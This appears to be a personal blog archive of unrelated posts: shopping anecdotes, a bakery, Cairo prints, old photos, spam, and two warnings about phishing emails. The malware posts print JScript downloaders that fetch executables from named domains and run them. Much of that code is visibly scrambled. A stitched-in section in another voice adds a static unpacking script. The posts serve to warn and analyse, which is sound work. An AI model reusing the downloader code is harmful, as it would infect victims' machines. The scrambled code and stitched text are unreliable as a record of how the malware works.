The King of the Upsells

Now that the birthday has passed, the story can be told.

I went to F.Y.E. to buy a CD for my wife. I take my purchase to the register.

First Up:

Salesgirl: “Do you want to sign up for the F.Y.E. Backstage Pass? It’s free for the first month!”
Me: “How much is it after the first month?”
Salesgirl: “Only $11.95 per month thereafter.”
Me: “No, thank you.”

Apparently FYE has not had good press regarding their “Backstage Pass.”

Next:

Salesgirl: “Would you be interested in the CD replacement warranty today?”
Me: “No thanks.” (I didn’t even bother to ask how much extra profit they wanted on this one.)

Next:

Salesgirl: Pointing to a display of potential magazine subscriptions taped to the counter, the kind you’d find lying around in a substandard doctor’s office – People, Vogue, Cosmo, etc. “Would you like to buy a subscription to any of these magazines?”
Me: “No thanks.”

Next: (Will this ever end?)

Salesgirl: Pointing to a discount bin by the register: “Would you be interested in any of these fine movies for only $5.00?”
Me: “No thanks.”

What I really wanted to say was, “Holy hqiz, girl, I only came in to buy one album. At least at McDonald’s they only ask you, ‘Do you want fries with that?’”

And the sad part is that these sales associates get graded on how many upsells they make, and probably have a regular quota to meet. I can’t imagine how many people they drive away with this relentless drive for nickels and dimes. Frankly I’m surprised they stay in business.

The Old Wolf has spoken.

“He takes them to a pastry shop to eat some good cakes.”

For as long as I can remember – my very earliest reading days in the 50s – Babar was one of my favorite children’s books. I always loved this page, where Babar takes his two little cousins Arthur and Celeste to a patisserie… those pastries always looked so good to me, and my mother had already introduced me to the delights of brioches.

Babar

Yesterday was my wife’s birthday, and we spent the day doing a massive Yarn Hop around the local yarn stores of Salt Lake, but before heading home, we stopped in at “Gourmandise,” a French bakery/café that sits at 250 South 300 East, right where the original Ratskeller Pizza Shoppe used to be.

gourmandise

Photo from their website

That display of pastries and other goodies is Babar come to life for me, and the quality is every bit what I would expect. (No, they’re not paying me for this post.)

Here are two of the goodies we brought home last night; the other two were devoured before I thought of writing this, and they were absolutely divine.

Pastries

Yes, they’re pricey – but you don’t find stuff like this for a buck and a quarter at Smith’s. It’s probably a very good thing that I’m not wealthy enough or close enough to patronize these guys on a regular basis, or I’d look like Fat Albert.

The Old Wolf has *belch*  spoken.

Six Views of Cairo – Robert Hay

The six lithographs below were published by the American University in Cairo Press in 1983. They were found among my mother’s possessions; she spent years in Egypt on various assignments from World War II to the 1970s.

Description

A - Sabil Kuttab

Description A

B - Bab Zuwayla

Description B

C - Bayn Al Qasrayn

Description C

D - Minaret, Ibn Tulun

Description D

E - A Circumcision Procession

Description E

F - Barquq Mosque

Description F

What would be really interesting would be some contemporary street scenes from Cairo showing what these locales look like today.

The Old Wolf has spoken.

Order to Appear in Court

Nothing to see here, folks, just move along. Another scam email from fraudsters trying to get me to download malware to my computer.

This time the JavaScript code wants to go out to startick.com, mrflapper.com, and ihaveavoice2.com (all of which are invalid top-level domains), and then download and install other nasty stuff to my computer.

Here’s the email that this came attached to:

To: [edited]
Subject: Notice of appearance in Court #00928994

From: “District Court” <jimmie.cowan@138-172.static.hkit4u.com>

Notice to Appear,
You have to appear in the Court on the July 27.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Jimmie Cowan,
Clerk of Court.
Attached: Notice_to_Appear_00928994.zip

That “notice to appear” attachment is actually a JavaScript file, and it came as garbage that looked like this:

function sah126() { return ’00) {‘; };  function sah125() { return ‘ == 2’; };  function sah210() { return ‘+fr+’; }; function sah86() { return ‘ar dn’; };  function sah105() { return ‘rea’; };  function sah95() { return ‘bj’; };

But as soon as the code runs, it concatenates all those little bits into something that looks like this:

var stroke=”55565C5E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function gvi() { return ‘e’; }

function sah() { return ‘val’; }

function dl(fr)l”); v { var b = “w’; };

ww.startick.com mrflapper.com ihaveavoice2.com”.split’; };

(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shelar fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; };’; };

try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(4851); dl(5382); dl(2753);var po = ”

for (var ckz=1; ckz<=242; ckz++) { po += this[‘sah’+ckz](); } this[gvi()+sah()](po);

I’ve mentioned these a few times before – the only way to keep yourself safe is to never open attachments you receive in email messages unless you are 100% sure whom they are from and what they are.

The bad actors want access to your data and your computer, and they don’t care how they get it.

Be careful out there.

The Old Wolf has spoken.

1911 – Hot town, summer in the city

Heat wave in New York. July 6, 1911. “Licking blocks of ice on a hot day.” 5×7 glass negative, George Grantham Bain Collection.

Found at Shorpy.

New York can get blistering hot when a heat wave rolls through. I experienced a number of days like this when I was growing up there. And I’m old enough to remember the ice man with his truck, and an electric crusher on the back so he could deliver chips as well as the blocks.

Our neighborhood didn’t get ice deliveries; those were mostly down in the village if I remember correctly. But I do recall that close to my home was a playground with one of these:

sprinklerball

It was a great way to cool off on a hot summer day. I’m glad there are still water attractions around to help kids stay cool in the summer heat.

The Old Wolf has spoken.

Spam from China

Chinese Spam

Why would anyone in their right mind respond to a mail blast like this, especially when it’s in Chinese?

尊敬的客户: 您好! 祝您业务更上一层楼。 我司十多年专为中小企业提供香港公司注册服务。在2014年在香港成立的公司有167279间,在2013年在香港成立的公司有174030间,在经济环境越不好的情况下,老板们更热衷研究并注册离岸公司。在香港成立公司是很简单的事情,两个星期多便可以注册完成,注册资本不需要验资,不需要到位,阁下也不需要到香港。在这些年,我们一直在埋头苦干,精心修炼,力争为您提供更专业的离岸注册服务。一直期待着您的联系。      希望! 本邮件是我们合作的开始.

———

English via Google Translate:

Dear Customer: Hello! I wish your business to the next level. Our ten years designed to provide SMEs in Hong Kong Companies Registry services. The company was established in 2014 in Hong Kong, there are 167,279 in the company in 2013 in Hong Kong has 174,030, in the worse economic environment, the owners are more keen to study and register offshore companies. Set up a company in Hong Kong is a very simple matter, more will be able to register two weeks to complete, registered capital does not require verification, no place, you do not need to go to Hong Kong. During these years, we have been working hard, careful cultivation, strive to provide you with more professional offshore registration services. We have been looking forward to your contact.I hope! This message is the beginning of our cooperation.

Unless they’re targeting people in the mainland, this seems like a phenomenally inefficient way of doing business. On the other hand, it could just be a phishing scam looking for the dumbest of the dumb.

The amount of business that is being done in the world based on dishonesty and deception makes my head hurt.

The Old Wolf has spoken.

The ‘10,000 Calorie Sundae’

The image above shows two young girls purchasing a so-called “10,000-calorie sundae” from Blair Parson’s store in Lynchburg, Virginia, sometime in the 1950s. Price: 35¢.

Odds are that this was some marketing license; the average hot fudge sundae comes in at about 284 calories, and these don’t look like killers. But it’s a cute picture.

Another package of JavaScript malware

I wish I were a JavaScript programmer.

Here’s the code that came to me via email in a .zip file, under the malicious guise of a FedEx delivery label (it was packaged to look like the code you see in my previous post.)


var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function cwm() { return ‘e’; };

function xn() { return ‘val’; };

function dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com soflectplit(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er)) { return ‘.c {}; if (dn == 1) break; } }; dl(7) { return ‘om”.s971); dl(6202’; };  var xv = ”; ); dl(613);

for (var rlh=1; rlh<=225; rlh++) { xv += this[‘xn’+rlh](); } this[cwm()+xn()](xv);


The email:

To: info@academyofgreatness.com
Subject: Problems with item delivery, n.00000732560

From: “FedEx International MailService” <seth.mcdowell@77.241.83.157.static.hosted.by.combell.com>

Dear Customer,

We could not deliver your item.
Please, download Delivery Label attached to this email.
Yours faithfully,
Seth Mcdowell,
Operation Manager.
FedEx_ID_00000732560.zip

I have said before and will say cheerfully again, Don’t Open Attachments from People You Don’t Know. Just don’t. Files labelled .zip, .exe, .js, or even .doc, .pdf, and others can be malicious. Sadly, too many people suppress the display of file extensions on their machine, because that’s the default Microsoft has herded people into, and it’s dangerous.

The script above goes out to two websites, “dickinsonwrestlingclub.com” which redirects to a Facebook page, and etqy.com. The registration of the first hides behind a privacy wall. The second is registered to someone in Turkey.

The code goes out to these websites and downloads other files, and then runs them. What will happen to your computer next is anyone’s guess. That’s why I wish I knew JavaScript better, so I could determine exactly what was being downloaded and what it is supposed to do.
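The fragment-and-eval packing used by both attachments on this page (this one and the “Order to Appear in Court” sample) can be unpacked as plain text, without running any of it. The following is an added example, not code from the original post or from the attachments; the function names and the inert sample (`zq` fragments, `.example` hosts) are constructed for illustration.

```javascript
// Static analysis only: the attachment text is parsed as data and never eval'd or run.

// One fragment looks like: function <prefix><n>() { return '<text>'; }
// Typographic quotes are accepted too, because blogs and mail clients "smarten" pasted code.
const SQ = "'\u2018\u2019", DQ = '"\u201C\u201D';
const FRAGMENT = new RegExp(
  `function\\s+([A-Za-z_$]+)(\\d+)\\s*\\(\\s*\\)\\s*\\{\\s*return\\s*[${SQ}]([^${SQ}]*)[${SQ}]\\s*;?\\s*\\}`, 'g');

// Rebuild the string the loader loop would hand to eval: fragments 1..N of one prefix, in order.
function reassemble(source) {
  const families = new Map();
  for (const [, prefix, n, text] of source.matchAll(FRAGMENT)) {
    if (!families.has(prefix)) families.set(prefix, new Map());
    families.get(prefix).set(Number(n), text);
  }
  // The payload family is the prefix with the most numbered fragments.
  let prefix = null, parts = new Map();
  for (const [p, m] of families) if (m.size > parts.size) { prefix = p; parts = m; }
  const last = Math.max(0, ...parts.keys());
  const missing = [];   // fragment numbers lost in transit, so gaps are visible
  let payload = '';
  for (let i = 1; i <= last; i++) {
    if (parts.has(i)) payload += parts.get(i); else missing.push(i);
  }
  return { prefix, payload, missing };
}

// Pull out what a responder needs for blocking and hunting.
function indicators(payload) {
  const hostList = payload.match(new RegExp(`[${DQ}]([^${DQ}]+)[${DQ}]\\s*\\.split\\(\\s*[${DQ}] [${DQ}]\\s*\\)`));
  const progIds = [...payload.matchAll(new RegExp(`ActiveXObject\\(\\s*[${DQ}]([^${DQ}]+)[${DQ}]`, 'g'))].map(m => m[1]);
  return {
    hosts: hostList ? hostList[1].split(' ').filter(Boolean) : [],
    progIds: [...new Set(progIds)],
    writesAndRuns: /saveToFile/i.test(payload) && /\.Run\(/.test(payload),
  };
}

// Constructed, inert sample in the same shape as the attachment (fragments out of order).
const SAMPLE = [
  `function zq3() { return 'new ActiveXObject("WScript.Shell");'; }`,
  `function zq1() { return 'var b = "one.example tw'; }`,
  `function zq2() { return 'o.example".split(" "); '; }`,
  `function gv() { return 'e'; }`,
].join('\n');

const rebuilt = reassemble(SAMPLE);
console.log(rebuilt.payload);
console.log(indicators(rebuilt.payload));
```

Run it under Node.js on a copy of the attachment saved as text; a non-empty `missing` list means the reassembled payload has holes and the indicator list may be incomplete.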

Whatever the case, stay away from attachments in your email.

The Old Wolf has spoken.